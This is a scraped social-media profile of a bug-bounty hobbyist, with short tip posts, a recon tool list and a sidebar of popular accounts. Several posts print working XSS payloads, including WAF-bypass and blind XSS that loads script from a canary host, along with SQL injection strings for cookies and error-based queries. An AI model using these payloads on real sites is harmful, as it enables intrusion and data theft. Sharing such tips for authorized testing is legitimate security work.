Olivia
Online
H4ck3r-sU
@2appstudio
~Cybersecurity researcher and enthusiast~
~Passionate about protecting the digital world~
Joined July 2023
60 Following
22 Followers
17 Posts
@RadhaSec There was no filter, so we could perform XSS and CSRF attacks. Additionally, there was no rate limit.
</p><img src=x onerror=confirm(0)>
@icimod hello sir/madam i hope you all are good. i am security researcher recently i found a bug on your site. that bug allow to access data management system. if you need more information than contact me thanks. it's very very critical issued.
i am tired to mailing you
25 Top Recon Tools For Ethical Hackers / Bug Bounty
>Nmap
>Maltego
>Gau
>Subfinder
>Dirsearch
>Amass
>Gobuster
>Feroxbuster
>Gowitness
>Altdns
>Rustscan
>Waymore
>Gospider
>NAABU
>Masscan
>Gotator
>FFUF
>DnsValidator
>WhatWeb
>Assetfinder
>Censys
>Reconftw
>Nslookup
>Infoga
>Builtwith
Our Next Bug Bounty & Ethical Hacking Training is starting from mid-March, DM to avail seats.
๐ซ๐ฆ๐ฆ ๐ถ๐ป ๐๐ต๐ฒ .๐ฐ๐๐ ๐จ๐ฅ๐ ๐ฝ๐ฎ๐๐ต
๐ข๐ฟ๐ถ๐ด๐ถ๐ป๐ฎ๐น ๐จ๐ฅ๐: "target/lib/css/animated.min.css"
๐ซ๐ฆ๐ฆ ๐๐ผ๐๐ป๐ฑ ๐ถ๐ป:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
By:@thecybertix
#bugbountytips #BugBounty
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE
-1 OR 6=6 AND 0-0=> TRUE
Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0
#bugbountytip #bugbounty #SQL
![IsrewyMohand's tweet photo. Found SQL Injection in [org_id] Cookie
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE
-1 OR 6=6 AND 0-0=> TRUE
Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0
#bugbountytip #bugbounty #SQL https://t.co/IfYXGkStyW](https://pbs.twimg.com/media/GHpfLv7XQAAgZ-B.jpg)
โ ๏ธ A group of hackers is targeting Bharat government websites. Today, they leaked 500k+ ( *.gov.in ) admin/users login credentials, and they are also continuously launching DDoS attacks on Indian government websites.
#CyberSecurity #infosecurity #Dataleak
Xss is not easy finding
1- Digging for vulnerable endpoint -> 4 Hours
2- Find parameter with param miner
3- Bypass waf -> 30 mins
Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>
#bugbounty #bugbountytips
>
#bugbounty #bugbountytips https://t.co/4X0H3ARcJb](https://pbs.twimg.com/media/GGV3-xXXcAA_6tC.png)
Ever came across an API endpoint like the one below? ๐ง๏ธ
If you skipped testing these before, you probably missed out on a few IDOR vulnerabilities... ๐ฌ๏ธ
Here's how ๐ค ๐๏ธ
Adding 2 new blind XSS payloads to the XSS scanner payload vault ๐
'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>
AND
'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>
๐ฅท
@ChatFTW hello i found some bugs how can i submit ? on your ai
@ChatFTW i have a issue
hello
Some recent lessons learned:
If something is suspicious but SQLMap โthinksโ it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@realNumberSets @Ralpalino @Sleepy4PF @HappyPower @FNChiefAko are you play ctf i have some challanges
@Second2st are you play ctf i have some challanges
@pgsuk i got a bug on your site how can i report
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.9M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.2M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.5M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.1M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
59.9M followers